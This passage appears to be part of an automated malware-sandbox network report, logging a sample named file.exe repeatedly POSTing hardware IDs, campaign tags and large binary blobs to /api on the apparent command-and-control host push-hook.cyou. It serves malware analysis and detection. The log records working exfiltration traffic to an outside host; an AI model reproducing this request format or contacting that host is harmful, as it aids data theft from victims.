                                                                  Server: cloudflare
                                                                  CF-RAY: 8e79663ccca7c452-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19101&delivery_rate=1751649&cwnd=230&unsent_bytes=0&cid=3c59d5756994d775&ts=1056&x=0"
                                                                  2024-11-24 12:28:33 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-24 12:28:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449733172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:34 UTC269OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=JXGX8S01
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8723
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:34 UTC8723OUTData Raw: 2d 2d 4a 58 47 58 38 53 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 44 32 33 31 39 39 37 30 31 33 43 45 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4a 58 47 58 38 53 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 58 47 58 38 53 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4a 58 47 58 38 53 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                  Data Ascii: --JXGX8S01Content-Disposition: form-data; name="hwid"97D231997013CEACD7CBBD6DF28D3732--JXGX8S01Content-Disposition: form-data; name="pid"2--JXGX8S01Content-Disposition: form-data; name="lid"FATE99--test--JXGX8S01Content-Dispositi
                                                                  2024-11-24 12:28:35 UTC1014INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=3f21uam170ssfmduc791c57bsf; expires=Thu, 20-Mar-2025 06:15:13 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNj%2BpU7E2GSb5%2FwMqCibuxrTgAHrXwEum5mYX%2B1ZGquff0PdwOhqxvY1eMSgcb8HZQSFvtQjaSNVXZ2PDbT6Guj7Bk5KCbpIzUyIf2%2BOLRgvlfizEVLgZqp9uURAY4Hp2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e79664b9e54efa7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1865&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9650&delivery_rate=1545791&cwnd=79&unsent_bytes=0&cid=1120aa36ee48caeb&ts=899&x=0"
                                                                  2024-11-24 12:28:35 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-24 12:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449734172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:36 UTC275OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=MJD875SE1CZE6
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 20406
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:36 UTC15331OUTData Raw: 2d 2d 4d 4a 44 38 37 35 53 45 31 43 5a 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 44 32 33 31 39 39 37 30 31 33 43 45 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4d 4a 44 38 37 35 53 45 31 43 5a 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 4a 44 38 37 35 53 45 31 43 5a 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4d 4a 44 38 37 35 53 45 31 43 5a 45
                                                                  Data Ascii: --MJD875SE1CZE6Content-Disposition: form-data; name="hwid"97D231997013CEACD7CBBD6DF28D3732--MJD875SE1CZE6Content-Disposition: form-data; name="pid"3--MJD875SE1CZE6Content-Disposition: form-data; name="lid"FATE99--test--MJD875SE1CZE
                                                                  2024-11-24 12:28:36 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: lrQMn 64F6(X&7~`aO
                                                                  2024-11-24 12:28:37 UTC1015INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=8o9hhq3g0mteroivnjkj3kkel2; expires=Thu, 20-Mar-2025 06:15:16 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBjflVMgdigrcLFZ8g8JNIAMDqxrZXG9AALJ8%2FNsOwLulBqJkNCaHjDXOZi2qe%2BM8nYIm0wEMcI4%2BMbuPdTee6dldCZCxOvfvLG5dmyYFhXohzdnaDEdlmqkICL5uNO1AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e79665a881ede94-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1745&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21361&delivery_rate=1650650&cwnd=217&unsent_bytes=0&cid=b20659a5b956ca93&ts=883&x=0"
                                                                  2024-11-24 12:28:37 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-24 12:28:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449735172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:39 UTC275OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=714XHRNHY06QKG
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1216
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:39 UTC1216OUTData Raw: 2d 2d 37 31 34 58 48 52 4e 48 59 30 36 51 4b 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 44 32 33 31 39 39 37 30 31 33 43 45 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 37 31 34 58 48 52 4e 48 59 30 36 51 4b 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 31 34 58 48 52 4e 48 59 30 36 51 4b 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 37 31 34 58 48 52 4e 48 59
                                                                  Data Ascii: --714XHRNHY06QKGContent-Disposition: form-data; name="hwid"97D231997013CEACD7CBBD6DF28D3732--714XHRNHY06QKGContent-Disposition: form-data; name="pid"1--714XHRNHY06QKGContent-Disposition: form-data; name="lid"FATE99--test--714XHRNHY
                                                                  2024-11-24 12:28:40 UTC1022INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=ghd1tjra1gqu5kursp81kbpatg; expires=Thu, 20-Mar-2025 06:15:18 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2BzWUlXw4X%2BY1itmUGzFtJPMvkvWyd7t%2Fw6R5%2Bn5tOtT%2FX8HFaRm03jMdPN%2B7iCIlRvMzMscj1duaQ9GfN0XpkeaEs3bCrhgcFoXBaS3WOKrHfmvu%2Fk%2FO8Toc8uJcr5iQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e79666c6b34437b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1619&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2127&delivery_rate=1761158&cwnd=248&unsent_bytes=0&cid=ae4817e4cf60e546&ts=718&x=0"
                                                                  2024-11-24 12:28:40 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                  Data Ascii: eok 8.46.123.75
                                                                  2024-11-24 12:28:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449736172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:42 UTC273OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=CH7IYAUXOQ
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 586119
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 2d 2d 43 48 37 49 59 41 55 58 4f 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 44 32 33 31 39 39 37 30 31 33 43 45 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 43 48 37 49 59 41 55 58 4f 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 48 37 49 59 41 55 58 4f 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 43 48 37 49 59 41 55 58 4f 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                  Data Ascii: --CH7IYAUXOQContent-Disposition: form-data; name="hwid"97D231997013CEACD7CBBD6DF28D3732--CH7IYAUXOQContent-Disposition: form-data; name="pid"1--CH7IYAUXOQContent-Disposition: form-data; name="lid"FATE99--test--CH7IYAUXOQContent-D
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: a2 76 db 4c 01 a2 5c 15 3c 20 a7 dd 31 33 a5 dc 61 48 57 ae 39 7e 20 6f 27 9f 93 b0 53 69 df 78 e0 dc 99 c5 3c 72 4b 60 2c 2c 01 49 50 88 59 d6 47 47 8c 5e d2 e2 e8 b7 7f 20 d9 5f 55 c3 cd d1 cc 90 56 15 dc 94 f8 12 6d 66 39 e8 5a 7a e6 18 1f e4 ab d1 60 32 b3 c7 c7 85 9a e5 c3 b4 1e a0 61 a2 03 bf 54 ca f7 f9 27 f8 bd 0d 4a e4 d1 c4 c2 e5 59 fa 53 55 18 b8 17 9b c3 67 0f d7 c8 14 88 79 0a b6 da 44 07 27 53 f8 32 5f 2e 7d 50 ef d5 b3 f6 e0 58 00 53 e3 98 c8 55 c4 2f 5d 2b 35 97 92 72 66 cd 5d 1c 09 c1 dc e7 d8 df 73 21 d5 0b c5 d1 bf 60 e4 8c ba 1b 3f 23 8a ee c5 2b 0c 87 c9 62 61 04 b9 bd 3c 04 08 d5 0e bd 0b f4 c9 36 41 15 ee dd 1c c7 a5 67 aa fe 50 56 25 52 61 c5 74 93 3b 6d d0 f8 e4 87 d8 61 ce d5 23 82 88 13 0c d8 7a 2d 34 cc 3c 14 ab ca 09 d4 ca 09
                                                                  Data Ascii: vL\< 13aHW9~ o'Six<rK`,,IPYGG^ _UVmf9Zz`2aT'JYSUgyD'S2_.}PXSU/]+5rf]s!`?#+ba<6AgPV%Rat;ma#z-4<
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 31 60 52 1b 90 6c c3 e6 f9 e3 ce 86 fa f0 90 46 42 ad 50 4d 21 32 d0 7d 88 e6 aa 92 45 d3 e9 40 b7 43 ba bc 6b fd 9b 2e b6 30 82 10 3e 39 61 38 ba 72 67 40 dc 59 f8 b4 8b d1 0c d4 fa 80 4c aa de 99 5d 76 e4 4a 2d 4a 2c d0 f1 d9 fb 29 1e 76 ac dd 71 20 3a d9 97 5f 7d ab b4 3d 62 e7 36 44 ee e0 29 65 34 cd f8 67 e1 68 6d ea 54 38 10 46 5a 7d e5 61 e6 cb 29 93 f4 b0 4a c3 d9 b6 ab f6 3e 00 b1 59 c9 30 01 dc f3 f1 dc bb e5 89 7b 9e 85 e0 b5 13 a0 3b f5 0e 57 d7 07 f1 10 95 15 97 89 0c d4 d9 05 e1 52 25 74 fe b3 c4 5f 0d c5 07 78 5b 03 44 04 12 20 72 7d f4 d2 f1 e3 02 ff 7d 22 5f 32 35 3f 35 55 78 14 95 c7 a3 03 d7 76 2e 6a e5 72 ce 3f 79 c1 db a4 df 1a cb 8e f6 61 cb 92 dd 34 25 19 01 e7 67 01 eb 76 7c 18 cc ab ef 3b e5 3f a4 d9 b8 dd 9e 1b c9 1c 16 27 8d 97
                                                                  Data Ascii: 1`RlFBPM!2}E@Ck.0>9a8rg@YL]vJ-J,)vq :_}=b6D)e4ghmT8FZ}a)J>Y0{;WR%t_x[D r}}"_25?5Uxv.jr?ya4%gv|;?'
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 9c ca 6f 00 30 00 4d 10 01 8f cf da 09 f6 49 03 5b d6 cf 77 17 e7 6f 02 0f f9 96 f7 80 a4 26 5c cd be cb 01 f0 dd 14 51 cf d6 38 08 90 f4 83 68 42 41 a0 4a 8f de c9 cb 59 5a 17 41 c4 35 cb 47 f3 00 df 44 fe 7e 6e dd 1f 93 3e 43 8a 88 23 c5 11 79 00 37 22 09 9e 58 00 ac 26 5b 44 18 73 12 72 04 01 55 38 d5 2d c2 d6 91 98 cc bf 17 40 67 0f 6f e4 ef e5 d8 a8 00 ca 22 95 ce eb 83 23 07 cf 4e f0 aa 17 60 07 2a 36 3f 0d 8c e0 f4 d8 2a b1 d1 50 c8 7b 00 29 df 26 41 01 37 2b e4 2c 18 2a 1b df c0 42 f1 c6 7a ba 4c 14 2d c0 07 0b 91 a7 e4 75 0b b6 d8 1d 75 72 38 10 ed af 5d 90 84 f6 0c 58 b8 3c 98 fb a8 be 64 a5 a5 f6 a8 d4 94 c6 18 7a c8 f6 ac 3b 7c fa 1a fb d5 b7 89 ce 3d 1e 00 8b 97 19 21 4a 20 2a cb a1 7e 67 a9 ee 27 01 8a 8a 5c d5 f2 ca fd a9 03 cc 55 db 43 23
                                                                  Data Ascii: o0MI[wo&\Q8hBAJYZA5GD~n>C#y7"X&[DsrU8-@go"#N`*6?*P{)&A7+,*BzL-uur8]X<dz;|=!J *~g'\UC#
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 08 fc 3c 0f c4 20 4e 1d 60 4a bd d2 81 ea 25 96 da 51 30 b4 47 6a 11 01 ba 8f 63 6d 11 3c 66 d2 e8 65 2e b0 05 e7 e6 90 de f0 40 2e cd 7d 12 08 d4 51 68 0c 87 d7 9d bd 06 0b e2 38 d0 73 5a e9 e9 c0 57 0c 8b 99 d7 82 ea 17 1e 4b df a7 21 0d 5f 3c d1 1c 13 93 0d a5 38 19 11 70 eb ec bc 6b 27 52 f8 1b 09 66 35 a5 5a 28 6d 3f a3 b7 47 30 b6 ec a6 9b f9 1f 40 a9 79 f3 53 88 b9 00 97 20 98 e7 a3 9c 9d 86 1c 59 85 f1 7d c4 ab 9e 88 3e 99 62 89 7b 6a ed 65 39 e4 2e 15 bd 37 f7 b5 cc 26 0f 55 05 16 03 59 d4 a1 0f 6a cf dc 73 e8 0c 5e ab 33 ab 17 62 09 9f 24 ba a9 43 85 51 d0 8d 33 59 bb a5 a2 cf 73 8d f1 14 bd 13 91 fd 7f 44 15 61 65 df c6 35 51 b6 bf 77 ca 17 e2 82 78 58 5e 2f b5 b8 b6 a7 75 4a bf 04 11 0c 6d f4 96 7c c8 9a ec ce dd 66 2f 1c 22 42 e4 d7 65 8a 19
                                                                  Data Ascii: < N`J%Q0Gjcm<fe.@.}Qh8sZWK!_<8pk'Rf5Z(m?G0@yS Y}>b{je9.7&UYjs^3b$CQ3YsDae5QwxX^/uJm|f/"Be
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 73 7a 98 34 3f f5 ed 85 90 fd b4 03 05 50 6e 0f d3 df 4f 7c 6c 4d 17 04 1d 15 40 1e 06 98 26 9f f6 a3 41 cd f3 32 50 33 0a 68 da b2 80 d9 2d c3 35 51 07 8c cf 4a 1c 69 1d 1a fb f9 20 4c 0a 48 e9 14 61 6e a4 05 2f 94 4d 3c 73 4d fb 6b a1 62 b1 7a e2 28 da 9d 9b e0 54 f2 b5 6f 02 9d ef dc 2c 7a b4 e0 ae d3 39 cb 6c fa fe c7 d9 1b 41 67 ed f7 13 bc fa ce e5 35 fc fc 5c 39 73 1a c1 5f a7 70 40 5d 5d 46 a2 e6 47 78 18 1c a2 bc 66 05 ef 8c ca 55 c3 fd cf 85 ac 35 ea 5e 92 3e 70 6e d3 e0 fb a0 ae c6 08 10 41 d8 71 14 e5 d2 ae 91 96 c3 28 9e 46 b0 f4 ac 64 25 d1 d1 95 29 20 0d 2e 41 d5 87 ce 66 04 22 f2 f3 4d 31 36 79 14 ca 50 09 aa fd c4 ce 42 28 65 30 87 44 dc 3c ec 95 99 8b 9f 05 45 aa d4 64 78 07 8c 6b de 44 71 1d d6 7e 99 9c 87 f8 59 58 e4 15 aa ea e4 9a e5
                                                                  Data Ascii: sz4?PnO|lM@&A2P3h-5QJi LHan/M<sMkbz(To,z9lAg5\9s_p@]]FGxfU5^>pnAq(Fd%) .Af"M16yPB(e0D<EdxkDq~YX
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 70 5b 89 56 22 90 1c c0 73 83 51 0b a2 f6 de 2e ce a6 7e 33 c5 c6 04 c5 80 d0 43 39 7d 31 be 2d 5b 3d 1b 76 2a 7d bb 71 19 bc 84 44 1c f6 b9 4d 99 1a 15 4f a1 8a f2 96 d8 87 ef 3a 4c df b3 ab 39 a0 f8 0b 41 fc 81 bd 27 a0 75 0d c4 d6 0e bf f2 74 74 01 92 d1 e4 8b 56 5c 91 88 00 2a 88 39 d3 54 78 3d 17 78 88 81 35 ac 97 38 a0 2a 36 69 0f 40 19 01 58 92 f7 2d 38 f5 28 9a c8 0f 6c 25 88 f3 95 e8 aa 0b bd 74 0b 3b fe 5e 18 f5 16 2d 3d 5d c8 06 06 5c 96 69 af 2e 87 39 ab 66 50 6b f4 40 4a 1d 7e d7 f2 fa 5e 39 11 56 bc 31 55 11 d8 88 ae 17 03 8b 1e 97 73 04 3e f0 31 a2 1d 46 e0 5b 17 15 ef df 1d a6 8c 3d ff 39 23 9e 47 a3 dc 7d 8a 75 63 30 c9 c2 dc 21 4c 0f 6e a1 54 17 19 6e 6f 47 33 82 17 38 ed 8c 15 85 cd 9c 3f 82 c5 f4 36 6a 11 91 14 2c 4d fe ed 79 22 a8 3d
                                                                  Data Ascii: p[V"sQ.~3C9}1-[=v*}qDMO:L9A'uttV\*9Tx=x58*6i@X-8(l%t;^-=]\i.9fPk@J~^9V1Us>1F[=9#G}uc0!LnTnoG38?6j,My"=
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: c6 d3 ab 86 f0 a3 f8 db 1b cd b1 2b eb 98 d1 3a bc 2b 79 de 37 8e c5 5e 5c b6 f8 34 33 3c eb 40 b9 06 96 02 e9 ae 2c 0d dd ff 87 a7 f3 0a 6b 6a 8b d6 f6 5c 29 24 f4 d0 3b 04 b0 a1 34 45 7a 0b 45 60 5b 51 2c 28 2d 88 0a 0a 48 90 26 35 8b 00 82 4a 73 6f 15 0b 4d 51 41 45 8a 14 e9 84 22 b0 15 29 4a af 41 d0 20 bd 87 12 92 3f ec f3 9f 73 13 7d b8 20 3c 6b cd 39 c6 37 de 6f ce 31 fa 6a 96 67 9c 96 47 1d d8 1b 9f a7 b5 59 45 8d f3 28 86 ec 93 af 4e 91 27 33 9e ed ce b8 de ee c8 3c ae c7 ee ea 9f 0b 6a 9e af 74 67 a5 d6 5b 94 a1 8c 57 52 af d6 f4 76 ff d6 2a 0b ad 64 99 2d b6 bb 54 31 6e 2d d3 fd 48 b8 82 76 a4 09 06 b9 6d 4a 7f de 1e 98 dc 11 7e 67 79 b1 3d f8 f1 96 e9 e1 bd bf 92 49 c2 08 aa 64 a7 dc 9d 85 e3 67 e1 88 ab 4a d8 ae 33 42 3a bc 48 ac c0 d0 64 9e
                                                                  Data Ascii: +:+y7^\43<@,kj\)$;4EzE`[Q,(-H&5JsoMQAE")JA ?s} <k97o1jgGYE(N'3<jtg[WRv*d-T1n-HvmJ~gy=IdgJ3B:Hd
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 0e 81 20 72 80 25 87 48 6f cb 68 94 44 c3 6e 72 d0 4d 34 38 20 30 59 82 80 41 04 0f 1b 0b 62 91 50 c9 09 7b 45 fc 7d c2 c0 11 d8 cd ad 00 82 f7 6d d3 9e 59 45 84 cf 5c b8 86 f8 3e 6b 0d e2 94 e1 cc 00 20 0c 2e 71 10 82 4f 19 48 6e 2f 45 c0 7a c2 33 fc 15 ed 89 14 1c d5 24 ce 0f 01 41 2a e6 0d 58 41 8b 57 29 c9 a7 d2 e0 08 93 4c 3d 94 b7 6c 1f 82 a0 26 d0 a9 a7 f9 42 41 8e 12 cf 35 5e 93 b6 6d bd 97 63 0b 1f 02 f6 86 13 2f 26 59 9c b8 64 6e ca c1 b8 7f b7 f1 9c 2d e4 2f e3 03 03 b7 04 63 76 fa 25 1e 8c 6b 43 ef 62 2e cf e3 fa 52 6e 20 d7 da 4c 7f ec ca 7d ad 08 87 82 f0 b8 cd 5b e2 f8 31 05 22 3e 2d d2 9f 09 a1 7e 4a 99 13 ac 82 bb 7f 61 fa 30 9a 1e 10 7e ce 55 e1 67 5d 74 0c cf 0e d7 6a e3 ef 32 66 d9 ec 75 21 31 a0 a9 83 e2 b9 02 d4 43 b8 1c 3f 76 d7 76
                                                                  Data Ascii: r%HohDnrM48 0YAbP{E}mYE\>k .qOHn/Ez3$A*XAW)L=l&BA5^mc/&Ydn-/cv%kCb.Rn L}[1">-~Ja0~Ug]tj2fu!1C?vv
                                                                  2024-11-24 12:28:42 UTC15331OUTData Raw: 0c ea 67 89 9f 35 f1 eb ef 94 6d bf 9a 62 b9 b5 b9 72 05 08 6a db f8 2e 0b cb 27 af e5 cb ee 14 25 d9 0a d2 2b 7a 4d da dd ab ec 6c 77 ae da 9e ad d4 18 cb d0 d8 d0 23 05 ab 80 15 df 31 dc 9f 73 05 17 8e 1c ee ae 33 29 db 26 7d 33 46 45 d9 8f 87 cf 23 f8 b4 d8 5d 1b ee bd 33 c6 14 33 07 96 eb 98 82 3b 4b 68 53 68 ee e0 88 e7 d8 0b 93 63 17 32 c9 f9 65 2b 7d 33 c7 6c 9b b1 f9 15 48 ed fd 5e 32 b0 18 fe a7 7e 1b 57 a3 41 e4 e5 54 15 49 59 b2 c1 60 be 18 b8 b2 88 01 19 31 64 55 2e 45 ce 3b a7 75 55 55 8c b5 16 c8 1c 00 eb ed a7 1c 93 af e6 93 75 be 8e 30 53 83 98 bf 16 34 82 d8 c1 fb d6 7b e8 45 2e c6 7e bf 73 da 90 43 f2 9b 0b 8f 3e f7 0f fc da eb ee a9 a0 df 29 57 fb ec 43 a8 bf d5 da c8 bd 7f 8a 56 0f 9c fa 77 84 3c 73 36 fb c7 47 fe 24 b2 da e0 7a a3 54
                                                                  Data Ascii: g5mbrj.'%+zMlw#1s3)&}3FE#]33;KhShc2e+}3lH^2~WATIY`1dU.E;uUUu0S4{E.~sC>)WCVw<s6G$zT
                                                                  2024-11-24 12:28:47 UTC1021INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
